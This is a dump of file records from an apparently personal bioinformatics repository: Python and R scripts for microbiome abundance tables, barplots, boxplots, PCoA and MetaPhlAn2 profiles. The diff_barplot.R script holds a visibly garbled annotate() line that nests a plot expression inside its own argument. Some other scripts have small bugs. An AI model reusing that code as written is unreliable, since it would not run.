"is_vendor": false,
"language": "Python",
"length_bytes": 3090,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 80,
"path": "/geneInsample.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#得到基因丰度表以后,计算基因在样本中的存在情况,如至少在 10% 的样本存在的基因有多少,20%,30%... 以此类推, 并且按照需要输出低于某一阈值的基因 ID, 用来后续分析的过滤,如在少于 10% 样品中存在的基因 ID.\n\n#!/usr/bin/python3\nimport pandas as pd\nimport argparse\nimport matplotlib\nmatplotlib.use('Agg') # 不加这个画图的时候会报错\n\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\n-------------------\nSimple Introduction:\nCalculate the the number of genes beyond some threshold(eg:exist in 10%, 20%.. of all sample)\nExample: python3 geneInsample.py -i GeneCatalog_profile.xls.gz\nabundance file > 5G needs vf > 20G.\nTo be continued.\n------------------'''\n)\nparser.add_argument('-i','--Input', help = \"the abundance file.\")\nparser.add_argument('-o','--outdir',help = \"the output directory,default is current working directory.\",nargs='?')\nparser.add_argument(\"-v\", \"--version\",action='version', version='%(prog)s 1.0')\nargs=parser.parse_args()\nabdfile = args.Input\noutdir = args.outdir if args.outdir else '.'\noutpath = outdir + '/geneInsample.txt'\n\nif abdfile.endswith('gz'):\n df = pd.read_csv(abdfile, compression='gzip', header=0, sep='\\t')\nelse:\n df = pd.read_csv(abdfile, header=0, sep='\\t')\n\ndf.columns.values[0] = 'geneID'\ndf = df.set_index('geneID')\ntotalsample = len(df.columns)\nsampleNum = (df!=0).sum(axis=1) # the sample numers of each gene, including genes exist in no samples\ngeneOf_0 = sum(sampleNum == 0) # judge the genes number exist in no samples\n# error\nif geneOf_0:\n\tprint(\"some genes do not exist in all samples! please check your file!\\nThe corresponding gene numbers is \" + str(geneOf_0) + ' :)')\n\t#exit()\nelse:\n\tnext\n\ntotalGene = sum(sampleNum != 0)\n\nout = open (outpath,'w')\nout.write('\\t'.join(['threshold','sampleNumber','geneNumber','rate']) + '\\n')\nout.write('\\t'.join(['>0', '1', str(totalGene), '1']) + '\\n')\nfor x in range(10,91,10):\n\tthreshold = '>=' + str(x) + '%'\n\tsampleNumber = int(totalsample*(x/100)) + 1\n\tgeneNumber = len(sampleNum[sampleNum >= sampleNumber])\n\tgeneRate = round(geneNumber/totalGene,2)\n\tout.write('\\t'.join([threshold,str(sampleNumber),str(geneNumber),str(geneRate)]) + '\\n')\nout.close()\n\n### plot ###\nimport seaborn as sns\nimport matplotlib.pyplot as plt\ndt = pd.read_table(outdir + '/geneInsample.txt', sep='\\t', header=0)\nsns.set_style(\"ticks\")\np = sns.barplot(x=dt[\"sampleNumber\"],y=dt[\"geneNumber\"])\np.axes.set_title(\"geneINsample\", size=14)\np.set_xlabel(\"sample numbers(>=)\", size=12)\np.set_ylabel(\"gene numbers\", size=12)\np.tick_params(labelsize=10)\nfig = p.get_figure()\nfig.savefig(outdir+ \"geneINsample.pdf\")\n\n#print out the genes exist more than in 10% samples\n'''\nsampleOfTen = int(totalsample*0.1)\ngeneOfTen = sampleNum[sampleNum >= sampleOfTen]\nwith open('GeneOfTen.txt','w') as gene:\n\tgeneOfTen.to_csv(gene, sep='\\t')\ngeneprofile_10 = df[sampleNum >= sampleOfTen]\nwith open('geneprofile_10','w') as profile:\n geneprofile_10.to_csv(profile, sep='\\t')\n'''\n"
},
{
"alpha_fraction": 0.5860335230827332,
"alphanum_fraction": 0.5932961106300354,
"avg_line_length": 35.448978424072266,
"blob_id": "fecc237d514c5e4b2741c604449aae6a157e894e",
"content_id": "3a339b68290b6f986fad23e754c35104e63152d3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2190,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 49,
"path": "/16S/barplot_generate.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\n###############################\n#根据丰度表或者其他进行归一化,然后提取指定的一组物种或者 OTU, 并且生成带有分组信息的 barplot.txt 用于绘制 barplot, 最后生成物种或者 OTU 的排序; \n#时间关系,就不写成加外参的形式了,需要的文件在 Data 文件夹下边;\n#关键词:归一;排序;\n###############################\nimport pandas as pd\n#转化为相对丰度,并且提取需要的 OTU 的丰度\ndt = pd.read_table('OTU_table_for_biom.txt', header = 1, index_col = 0)\ndt = dt.iloc[:,:-1] #筛选列\ndt = dt.div(dt.sum(axis=0), axis=1) # 这一招绝了...佩服以前的自己\n\n\nwith open('otu_id.txt', 'r') as IN:\n otu_list= IN.read().split('\\n')\n otu_list.remove('')\ndf = dt.loc[otu_list]\ndf.to_csv('filter_OTU_table.txt', sep = \"\\t\")\n\n# 提取样品分组信息\ngroup_dict = dict()\ngroup_dt = pd.read_table('bms.info', index_col = 0)\n#group_dt.head()\nfor item in group_dt.index:\n group_dict[item] = group_dt.loc[item]['Description']\n \n#生成画 barplot 的图,四列,没有考虑合并低丰度的问题,也没过滤某个样本所有 OTU 都为零的情况;\nfrom collections import defaultdict\nwith open('filter_OTU_table.txt', \"r\") as IN, open('barplot.txt', \"w\") as out:\n out.write('individual\\ttax\\tabundance\\tgroup\\n')\n head = IN.readline().strip('\\n').split('\\t')\n Dict = defaultdict(float)\n for line in IN:\n lst = line.strip('\\n').split('\\t')\n taxonomy = lst[0]\n for index in range(1,len(lst)):\n key = head[index] + \"\\t\" + taxonomy + \"\\t\" + lst[index]\n Dict[key] = head[index]\n for key in Dict:\n keys = key.split('\\t')\n indiv = keys[0]\n taxonomy = keys[1]\n abund = keys[2]\n out.write(indiv + '\\t' + taxonomy + '\\t' + abund + '\\t' + group_dict[indiv] + '\\n') \n\n#tax_order 图例的顺序,这里是 OTU 的顺序,按照全部样品中的 OTU 的均值排列 \ndt = pd.read_table('barplot.txt', index_col=0)\ntax_order = list(dt.groupby('tax').abundance.mean().sort_values(ascending=False).index)\ntax_order = ','.join(['\"' + x + '\"' for x in tax_order]) \n"
},
{
"alpha_fraction": 0.565315306186676,
"alphanum_fraction": 0.5720720887184143,
"avg_line_length": 25.117647171020508,
"blob_id": "3cac0bf51d83723e5e547d5a78f07f88034b134b",
"content_id": "673860f741c6e5c33cfb85bb543da4c4c053f156",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 482,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 17,
"path": "/qsub/qstat_monitor.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 根据 qsub 的 jobID 进行定时的获取内存的监控,待完善\n#! /usr/bin/python3\nimport sys,os\nfrom datetime import datetime\nimport time\njobID = sys.argv[1]\ntime_sleep = int(sys.argv[2])\ndef timer(n):\n while True:\n print(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n vf = os.popen('qstat -j ' + jobID + '| grep usage').readline().strip('\\n')\n if vf:\n print(vf)\n else:\n exit()\n time.sleep(n)\ntimer(time_sleep)\n"
},
{
"alpha_fraction": 0.6170411705970764,
"alphanum_fraction": 0.6276529431343079,
"avg_line_length": 45.434783935546875,
"blob_id": "c4bc9df424e1ac26ad0c03833412be71fe82cc09",
"content_id": "54a86439320ea90a67286214e7f1c83a4000edfc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3216,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 69,
"path": "/rat/diff/boxplot.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3 \nimport argparse,re,numpy,os\nimport pandas as pd\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\n-------------------\nSimple Introduction:\ngenerate the boxplot based on different test.\nExample: python3 barplot.py -i phylumProfileTable.xls -o Process -r 0.01\nTo be continued.\n------------------'''\n)\nparser.add_argument('-a','--abd', help = \"the abundance file, eg M_expose_genusProfileTable.xls.\")\nparser.add_argument('-g','--group', help = \"the group name,eg EL:Cig.\")\nparser.add_argument('-c','--color', help = \"the color scheme,eg 487eb3:d2382c.\")\nparser.add_argument('-d','--diff', help = \"the filtered different test result file, eg filter_EL_Cig.E-liquid-Cigarette.wilcox.test.xls.\")\nparser.add_argument('-n','--number', help = \"the number of tax for boxplot,eg 20. default is 20.\", type=int, nargs='?')\nparser.add_argument('-f','--filter_type', help = \"the filter type of different result,eg pvalue. default is qavlue\", nargs='?')\nparser.add_argument('-p','--prefix', help = \"the prefix for output,eg genus.\")\nparser.add_argument('-o','--outdir', help = \"the output directory\")\nargs=parser.parse_args()\n(abd_file,group,color,diff_result,prefix,outdir) = (args.abd,args.group,args.color,args.diff,args.prefix,args.outdir)\npar = [abd_file,group,color,diff_result,prefix,outdir]\nif not all(par):\n\tparser.print_help()\n\texit()\n\ntax_number = args.number if args.number else 20\nfilter_type = args.filter_type if args.filter_type else 'qvalue'\n\nos.chdir(outdir)\ngroup_list = group.split(':')\nwith open(abd_file, 'r') as abd, open('tax_mean_order.txt','w') as out:\n out.write('Tax\\tMean\\n')\n head = abd.readline().strip('\\n').split('\\t')\n for line in abd:\n line = line.strip('\\n').split('\\t')\n control_list = list()\n case_list = list()\n for index in range(1,len(line)):\n if re.match('EL',head[index]):\n control_list.append(float(line[index]))\n else:\n case_list.append(float(line[index]))\n out.write(line[0] + '\\t' + str(numpy.mean(control_list)) + '\\n')\n out.write(line[0] + '\\t' + str(numpy.mean(case_list)) + '\\n')\n \nmean_order = pd.read_table('tax_mean_order.txt', header=0, index_col=0)\nplot_tax = numpy.unique(mean_order.sort_values(by = 'Mean', ascending=False)[:tax_number*2].index)[:tax_number]\n\nwith open(abd_file, 'r') as abd, open('boxplot.txt', 'w') as out:\n print('ID\\tAbd\\tGroup', file=out)\n head = abd.readline().strip('\\n').split('\\t')\n for line in abd:\n line = line.strip('\\n').split('\\t')\n if line[0] in plot_tax:\n for index in range(1,len(line)):\n if re.match(group_list[0],head[index]):\n print(line[0] + '\\t'+ line[index] + '\\t' + group_list[0], file=out)\n else:\n print(line[0] + '\\t'+ line[index] + '\\t' + group_list[1], file=out)\n\nrscript = 'Rscript /ifshk7/BC_PS/wangpeng7/Script/diff/boxplot.R boxplot.txt ' + group + ' ' + color + ' ' + diff_result + ' ' + filter_type + ' ' + prefix\nprint(rscript)\nos.system(rscript)\n# 删除过程文件\n#os.remove('boxplot.txt')\n#os.remove('tax_mean_order.txt')\n"
},
{
"alpha_fraction": 0.5637003183364868,
"alphanum_fraction": 0.5861509442329407,
"avg_line_length": 47.01298522949219,
"blob_id": "18bb15808fc8727fed3a6055532748bfa3b1d606",
"content_id": "e44df4aef95d9368a5df7c4cd0df4a702d37e094",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 3943,
"license_type": "no_license",
"max_line_length": 248,
"num_lines": 77,
"path": "/diff_barplot.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#根据输入文件,三列,分别是 Group Profile Disease,组别(case&control),数据,疾病组别,画柱状图,并且标显著性差异,小于 0.01 为 ** ,小于 0.05 为 *;\n# 有问题请发邮件 [email protected] ~\n\nlibrary(\"hash\")\nlibrary(\"ggplot2\")\ndata <- read.table('Y_temp',header=T,sep=\"\\t\")\ndata$Group <- factor(data$Group, levels=c(\"Control\",\"Case\"))\ndata$Disease <- factor(data$Disease, levels=c(\"AS\",\"RA\",\"Gout\"))\ncolor = c('#00BFC4','#F8766D')\nplot = ggplot(data, aes(x=Disease, y=Profile, fill=Group)) +\n geom_bar(position=position_dodge(), stat=\"identity\") +\n #labs(y=\"Relative abundance (x 1e-5)\",x=\"Disease\",fill=\"\",color=\"\", title=title) +\n scale_fill_manual(values = color) + \n theme(axis.text.x = element_text(colour=\"black\",size=10),\n axis.text.y = element_text(colour=\"black\",size=10),\n axis.line = element_line(color=\"black\",size=0.5),\n axis.ticks = element_line(color=\"black\",size=0.5),\n axis.title = element_text(color=\"black\",size=10),\n plot.title = element_text(color=\"black\",size=10),\n legend.position=\"none\",\n panel.background = element_blank()\n )\n\n#标显著性差异,根据 P 值大小,< 0.01 两个 * ,< 0.05 但是 > 0.01 一个 * ; \ngroup = c(\"AS\",\"RA\",\"Gout\") # 顺序需要和 X 轴一致\ndiff_x = c()\ndiff_sig_x = c()\n#pvalue = hash()\nfor ( i in 1:length(group)){\n subset = data[data$Disease == group[i],]\n p_value = wilcox.test(subset[subset$Group == 'Case',]$Profile, subset[subset$Group == 'Control',]$Profile,)$p.value \n# .set(pvalue, keys = group[i], values = p_value ) # R 的哈希,记录一下,虽然没有用到\n if (p_value < 0.01){\n diff_sig_x = c(diff_sig_x, i)\n }\n else if (p_value < 0.05) {\n diff_x = c(diff_x, i)\n }\n else {\n next\n }\n }\n\n#输出 注释掉的行用于外接参数和输出文件的情况 \n#png\nlabel_y = max(data$Profile)*1.1\nif (is.null(diff_x) & is.null(diff_sig_x)) {\n print(\"no item is different! check your data!\")\n} else if ( !is.null(diff_x) & is.null(diff_sig_x)) {\n #png(paste(filename_prefix,\"_barplot.png\",sep=\"\"),type=\"cairo\",units=\"in\",res=600,width=6,height=4,bg=\"transparent\") #集群\n #png(paste(filename_prefix,\"_barplot.png\",sep=\"\"), units=\"in\",res=600, width=6, height=4, bg=\"transparent\")\n plot + annotate('text', x = diff_x, y = label_y, label='*', size = 5)\n} else if ( is.null(diff_x) & !is.null(diff_sig_x)) {\n #png(paste(filename_prefix,\"_barplot.png\",sep=\"\"),type=\"cairo\",units=\"in\",res=600,width=6,height=4,bg=\"transparent\")\n plot + annotate('text', x = diff_sig_x, y = label_y, label='**', size = 5)\n} else {\n #png(paste(filename_prefix,\"_barplot.png\",sep=\"\"),type=\"cairo\",units=\"in\",res=600,width=6,height=4,bg=\"transparent\")\n plot + annotate('text', x = diff_x, y = label_y, label='*', size = 5) + annotate('text', x = diff_sig_x, y = plot + annotate('text', x = diff_x, y = label_y, label='*', size = 5) + annotate('text', x = label_y, y = -2, label='**', size = 5)\n, label='**', size = 5)\n}\n#dev.off()\n\n#eps\nif (is.null(diff_x) & is.null(diff_sig_x)) {\n #print(\"no item is different! 
check your data!\")\n} else if ( !is.null(diff_x) & is.null(diff_sig_x)) {\n\t#postscript(paste(filename_prefix,\"_barplot.eps\",sep=\"\"), width = 6, height=4)\n plot + annotate('text', x = diff_x, y = label_y, label='*', size = 5)\t\n} else if ( is.null(diff_x) & !is.null(diff_sig_x)) {\n \n\t#postscript(paste(filename_prefix,\"_barplot.eps\",sep=\"\"), width = 6, height=4)\n plot + annotate('text', x = diff_sig_x, y = label_y, label='**', size = 5)\n} else {\n\t#postscript(paste(filename_prefix,\"_barplot.eps\",sep=\"\"), width = 6, height=4)\n plot + annotate('text', x = diff_x, y = label_y, label='*', size = 5) + annotate('text', x = diff_sig_x, y = label_y, label='**', size = 5)\n}\n#dev.off()\n"
},
{
"alpha_fraction": 0.5944041609764099,
"alphanum_fraction": 0.6199678182601929,
"avg_line_length": 42.20000076293945,
"blob_id": "dad3a06e0e044716b02bb0b1844776fd9493151f",
"content_id": "66a55b175d5e8efbfa4f1a96abbdb86ed47b6e14",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 5090,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 115,
"path": "/rat/diff/boxplot.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/Rscript \n\nlibrary(ggplot2)\nlibrary(dplyr)\nArgs = commandArgs(TRUE)\nbox_table = Args[1] # boxplot.txt\ngroup_list = Args[2] # EL:Cig\ncolor_list = Args[3] # 487eb3:d2382c\ndiff_result = Args[4] # EL_Cig.E-liquid-Cigarette.wilcox.test.xls\ndiff_type = Args[5] # pvalue or qvalue\nprefix = Args[6]\nlegend_list = c(unlist(strsplit(group_list, \":\")))\ncolor_var = unlist(strsplit(color_list, \":\"))\ncolor_var = c(paste(\"#\",color_var,sep=\"\"))\nfilename_prefix = paste(prefix,gsub(\":\", \"_\", group_list),sep=\"_\")\n\ndata = read.table(box_table, header = T, sep = '\\t')\n\n# 确定横坐标轴的物种顺序,cig 相当于分组 2 和分组 1,暂时不改动代码\ncig_dt = filter(data, Group == legend_list[2])\ncig_group = group_by(cig_dt, ID)\ncig_summ = summarise(cig_group, cig_median = median(Abd))\nel_dt = filter(data, Group == legend_list[1])\nel_group = group_by(el_dt, ID)\nel_summ = summarise(el_group, el_median = median(Abd))\nmerge = merge(cig_summ, el_summ, by='ID')\nbigger = filter(merge, merge$cig_median > merge$el_median)\nless = filter(merge, merge$cig_median < merge$el_median)\n#x_order = as.character(rbind(bigger[order(bigger$cig_median),]['ID'], less[order(less$cig_median),]['ID'])$ID)\nx_order = c(as.character(rev(bigger[order(bigger$cig_median),]$ID)), as.character(rev(less[order(less$cig_median),]$ID)))\ndata$x = factor(data$ID, levels=x_order)\n\ndata$group<-factor(data$Group, legend_list)\nplot = ggplot(data,aes(x = x, y = log10(Abd))) +\ngeom_boxplot(aes(color = factor(group)), fatten = 1, lwd = 0.5, outlier.size = 0.5, position = position_dodge(0.9)) +\nlabs(x ='', y = expression(Relative~abundance~(log['10'])), fill = '', color = '', size = 10 ) +\nscale_color_manual(values = color_var) +\ntheme(\n\taxis.text = element_text(colour = 'black', size = 10),\n\taxis.text.x = element_text(hjust = 1, angle = 45), #phylum\n#\taxis.text.x = element_text(hjust = 1, face = 'italic', angle = 45), #genus\n#\taxis.text.x = element_text(hjust = 1, face = 'italic', angle = 60), #species\n\taxis.title.y = element_text(size = 10, face = 'bold'),\n\taxis.line = element_line(size=0.5, colour = \"black\"),\n\tlegend.position = c(0,0),\n\tlegend.justification = c(0,0),\n\tlegend.key = element_blank(),\n\tlegend.text = element_text(size = 10),\n\tlegend.key.width = unit(0.2, 'in'),\n\tlegend.key.height = unit(0.2, 'in'),\n\tlegend.background = element_blank(),\n\tpanel.background = element_blank(),\n\tplot.margin = unit(c(0.2, 0.2, 0.1, 0.2), 'in')\n)\n\n# 加差异显著的 * 或者 **, 目前只支持 0.05 和 0.01 \ndf = read.table(diff_result, header=T, sep=\"\\t\", check.names = F)\ndiffID_sig = filter(df, UQ(as.name(diff_type)) < 0.01)$ID # UQ .. 这个将字符串改变为内置变量\ndiffID = filter(df, UQ(as.name(diff_type)) > 0.01 & UQ(as.name(diff_type)) < 0.05)$ID\ndiff_x = c()\nif ( length(diffID) == 0 & length(diffID_sig) == 0) {\n\tprint(paste(\"no tax is different for\",diff_type,\"!\",sep=\" \"))\n\tq()\n}\nfor (i in 1:length(diffID)) {\n\titem = gsub('_',' ', diffID[i]) # 因为 ID 不统一\t\n if ( item %in% x_order) {\n diff_x = c(diff_x,(which(x_order == item)))\n\t\t\tprint(item) \n }\n}\n\ndiff_sig_x = c()\nif (length(diffID_sig != 0)) {\n\tfor (i in 1:length(diffID_sig)) {\n\t\titem = gsub('_',' ', diffID_sig[i])\t\n \t\tif ( item %in% x_order) {\n diff_sig_x = c(diff_sig_x,(which(x_order == item))) \n\t\t\tprint(item) \n \t\t}\n\t}\n} \n# eps\nif (is.null(diff_x) & is.null(diff_sig_x)) {\n print(\"no tax is different! 
check your data!\")\n\tq()\n} else if ( !is.null(diff_x) & is.null(diff_sig_x)) {\n\tpostscript(paste(filename_prefix,\"_boxplot.eps\",sep=\"\"), width = 6, height=4)\n plot + annotate('text', x = diff_x, y = -2, label='*', size = 5)\t\n} else if ( is.null(diff_x) & !is.null(diff_sig_x)) {\n \n\tpostscript(paste(filename_prefix,\"_boxplot.eps\",sep=\"\"), width = 6, height=4)\n plot + annotate('text', x = diff_sig_x, y = -2, label='**', size = 5)\n} else {\n\tpostscript(paste(filename_prefix,\"_boxplot.eps\",sep=\"\"), width = 6, height=4)\n plot + annotate('text', x = diff_x, y = -2, label='*', size = 5) + annotate('text', x = diff_sig_x, y = -2, label='**', size = 5)\n}\ndev.off()\n\n#png\nif (is.null(diff_x) & is.null(diff_sig_x)) {\n print(\"no tax is different! check your data!\")\n\tq()\n} else if ( !is.null(diff_x) & is.null(diff_sig_x)) {\n png(paste(filename_prefix,\"_boxplot.png\",sep=\"\"),type=\"cairo\",units=\"in\",res=600,width=6,height=4,bg=\"transparent\") #集群\n # png(paste(filename_prefix,\"_boxplot.png\",sep=\"\"), units=\"in\",res=600, width=6, height=4, bg=\"transparent\")\n plot + annotate('text', x = diff_x, y = -2, label='*', size = 5)\n} else if ( is.null(diff_x) & !is.null(diff_sig_x)) {\n png(paste(filename_prefix,\"_boxplot.png\",sep=\"\"),type=\"cairo\",units=\"in\",res=600,width=6,height=4,bg=\"transparent\")\n plot + annotate('text', x = diff_sig_x, y = -2, label='**', size = 5)\n} else {\n png(paste(filename_prefix,\"_boxplot.png\",sep=\"\"),type=\"cairo\",units=\"in\",res=600,width=6,height=4,bg=\"transparent\")\n plot + annotate('text', x = diff_x, y = -2, label='*', size = 5) + annotate('text', x = diff_sig_x, y = -2, label='**', size = 5)\n}\ndev.off()\n"
},
{
"alpha_fraction": 0.6904761791229248,
"alphanum_fraction": 0.6984127163887024,
"avg_line_length": 44.818180084228516,
"blob_id": "f0b6522d6bd6eab2ca6d8be39695bf2df22a112c",
"content_id": "331b24d9a5cbe701c80cb594521cffe1c06931dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 550,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 11,
"path": "/rat/beta/process.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\n#根据分组名字,合并组间组内的距离文件,并且运行 anova.R\nimport os,sys\nparent_dierctory = sys.argv[1]\ntitle = sys.argv[2] #\nitems = ['Fexpose','Frecovery','Mexpose','Mrecovery']\nfor directory in items:\n\tos.chdir(parent_dierctory + '/' + directory)\n\tos.system('python3 merge.py')\n\tos.system('Rscript anova.R intra_group.txt ' + directory +'_intra ' + title + ' ACK:EL:Cig distance group')\n\tos.system('Rscript anova.R inter_group.txt ' + directory +'_inter ' + title + ' ACK-Cig:ACK-EL:El-Cig distance group')\n"
},
{
"alpha_fraction": 0.6571428775787354,
"alphanum_fraction": 0.6571428775787354,
"avg_line_length": 13,
"blob_id": "f3fd856b1d65a566cbc55ef1fa446bc41923e797",
"content_id": "5f1e88572dd955ff1bf5073d4196eb1aa1ff6e28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 82,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 5,
"path": "/rat/beta/scp.sh",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 传输文件到 Mac 端\nfor x in `ls */*pdf`\ndo\n\texpect scp.expect $x beta\ndone\n"
},
{
"alpha_fraction": 0.5986678004264832,
"alphanum_fraction": 0.6269775032997131,
"avg_line_length": 42.672725677490234,
"blob_id": "c277ec4f5296799aa8d211d3b976190eb8b62d7d",
"content_id": "9ea8d3ccec7268763bb9660fbd6f6c84ce91a6c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 2624,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 55,
"path": "/PCoA_axis1.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#重现看到的一篇文章的 PCoA 图,可以看干预前后主坐标 1 的变化趋势,还是挺有意思的,输入文件(需要提前处理成一样的格式)在 Data 目录下;\n#文章:Links between environment, diet, and the hunter-gatherer microbiome;\n# 这是初始版本,接外参,加颜色什么的后边再完善吧..\n\nlibrary(\"ggplot2\")\nlibrary(\"vegan\")\nlibrary(\"ape\")\ndt = read.table('F_phylumProfileTable_PCoA.xls', header = T, row.names=1, sep = \"\\t\", check.name = F)\ngroup = dt %>% select(c('Time','SubjectID'))\ngroup$SampleID = rownames(group)\ndf = dt %>% select(-c('Time','SubjectID'))\nbeta.dis <- vegdist(df, method = \"bray\")\nPCOA <- pcoa(beta.dis, correction=\"none\", rn=NULL)\nresult <- PCOA$values[,\"Relative_eig\"]\npco1 <- as.numeric(sprintf(\"%0.3f\",result[1]))*100\npco2 <- as.numeric(sprintf(\"%0.3f\",result[2]))*100\nxlab=paste(\"PCoA1(\",pco1,\"%)\",sep=\"\")\nylab=paste(\"PCoA2(\",pco2,\"%)\",sep=\"\")\n\npc <- as.data.frame(PCOA$vectors)\naxis = pc %>% select(Axis.1, Axis.2)\naxis$SampleID = rownames(axis)\nplot_dt = merge(axis, group, by='SampleID')\n\n# 生成干预前后带有连线的 PCoA 图\nggplot(plot_dt, aes(Axis.1,Axis.2,group = SubjectID)) + geom_line(color = 'grey') + geom_point(size=3,aes(color=Time)) +\n geom_hline(yintercept=0,linetype=4,color=\"grey\") +\n geom_vline(xintercept=0,linetype=4,color=\"grey\") +\n labs(x=xlab,y=ylab) +\n theme_bw() +\n theme(axis.text = element_text(colour = 'black', size = 10), \n axis.title = element_text(size = 12),\n panel.background = element_rect(colour = \"black\", size = 1),\n #panel.grid =element_blank(), \n legend.key = element_blank(),\n legend.text = element_text(size = 10), \n #legend.title = element_blank(), legend.position='none', \n plot.margin = unit(c(0.4, 0.3, 0.1, 0.1 ), 'in'))\n\n\n#生成主坐标 1 的干预前后变化图\nggplot(plot_dt, aes(Axis.1, SubjectID, group = SubjectID)) + geom_line(color = 'grey') + geom_point(size=3,aes(color=Time)) +\n geom_hline(yintercept=0,linetype=4,color=\"grey\") +\n geom_vline(xintercept=0,linetype=4,color=\"grey\") +\n #labs(x=xlab) +\n theme_bw() +\n theme(axis.text = element_text(colour = 'black', size = 10), \n axis.title = element_text(size = 12),\n panel.background = element_rect(colour = \"black\", size = 1),\n #panel.grid =element_blank(), \n legend.key = element_blank(),\n legend.text = element_text(size = 10), \n #legend.title = element_blank(), legend.position='none', \n plot.margin = unit(c(0.4, 0.3, 0.1, 0.1 ), 'in'))\n"
},
{
"alpha_fraction": 0.5646067261695862,
"alphanum_fraction": 0.5717852711677551,
"avg_line_length": 39.55696105957031,
"blob_id": "1d2c28b2e751829549e8317c9ebdac85834cc33c",
"content_id": "7c6599688b8a1b626db7889555691ad969dde2dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3268,
"license_type": "no_license",
"max_line_length": 218,
"num_lines": 79,
"path": "/MetaPhlAn2/profileGenerate.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#基于 MetaPhlan2 合并后的文件输出不同水平的丰度表, 目前只有三个水平,门,属,种\n#! /usr/bin/env python3\nimport argparse,re\nparser = argparse.ArgumentParser(description = \"get the abundance file of some level of microbes from MetaPhlAn2_Merge_abundance_table ... To be continued!\")\nparser.add_argument('-i','--Input', help = \"the input file\")\nparser.add_argument('-o','--Output', help = \"the output directory\")\nparser.add_argument('-l','--level', help = \"the level of species,separated by a comma,like: phylum,genus,species\")\nargs=parser.parse_args()\n(Input,Output,level) = (args.Input,args.Output,args.level)\nif not Input or not Output or not level:\n print(\"Plase add the parameters,thank you :)\\n\\nExample: python3 genus_abundance.py -i MetaPhlAn2_Analysis/MetaPhlAn2_Merge_abundance_table.xls -l phylum,genus,species -o Taxonomy_MetaPhlAn2/MetaPhlAn2_Analysis\\n\")\n exit()\n\nlevel_list = list()\nif re.search(\",\",level):\n\tlevel_list = level.split(\",\")\nelse:\n\tlevel_list = level\n\n#=======genus=====\nif \"genus\" in level_list:\n\tprint(\"producing the genus abundance file\")\n\twith open(Input,'r') as IN, open (Output + \"genusProfileTable.xls\",'w') as out:\n\t\tIN.readline()\n\t\thead = IN.readline()\n\t\tout.write(head)\n\t\tfor line in IN:\n\t\t\t\tif len(line.strip('\\n').split('\\t')[0].split('|')) == 6:\n\t\t\t\t\tgenus = line.strip('\\n').split('\\t')[0].split('|')[-1]\n\t\t\t\t\tlst = line.strip('\\n').split('\\t')\n\t\t\t\t\tout.write(genus)\n\t\t\t\t\tfor index in range(1,len(lst)):\n\t\t\t\t\t\tout.write('\\t' + lst[index])\n\t\t\t\t\tout.write('\\n')\n\t\t\t\telse:\n\t\t\t\t\tcontinue;\n\tprint(\"producing the genus abundance file is done!\")\nelse:\n\tprint(\"not genus here!\")\n#=======phylum=====\nif \"phylum\" in level_list:\n print(\"producing the phylum abundance file\")\n with open(Input,'r') as IN,open (Output + \"phylumProfileTable.xls\",'w') as out:\n IN.readline()\n head = IN.readline()\n out.write(head)\n for line in IN:\n if len(line.strip('\\n').split('\\t')[0].split('|')) == 2:\n phylum = line.strip('\\n').split('\\t')[0].split('|')[-1]\n lst = line.strip('\\n').split('\\t')\n out.write(phylum)\n for index in range(1,len(lst)):\n out.write('\\t' + lst[index])\n out.write('\\n')\n else:\n continue;\n print(\"producing the phylum abundance file is done!\")\nelse:\n\tprint(\"not phylum here!\")\n#=======species=====\nif \"species\" in level_list:\n print(\"producing the species abundance file\")\n with open(Input,'r') as IN,open (Output + \"speciesProfileTable.xls\",'w') as out:\n IN.readline()\n head = IN.readline()\n out.write(head)\n for line in IN:\n if len(line.strip('\\n').split('\\t')[0].split('|')) == 7:\n species = line.strip('\\n').split('\\t')[0].split('|')[-1]\n lst = line.strip('\\n').split('\\t')\n out.write(species)\n for index in range(1,len(lst)):\n out.write('\\t' + lst[index])\n out.write('\\n')\n else:\n continue;\n print(\"producing the species abundance file is done!\")\nelse:\n\tprint(\"not species here!\")\n"
},
{
"alpha_fraction": 0.6152832508087158,
"alphanum_fraction": 0.6205533742904663,
"avg_line_length": 20.685714721679688,
"blob_id": "4172862f64e7d5384b2a3a002c7bc642de084e75",
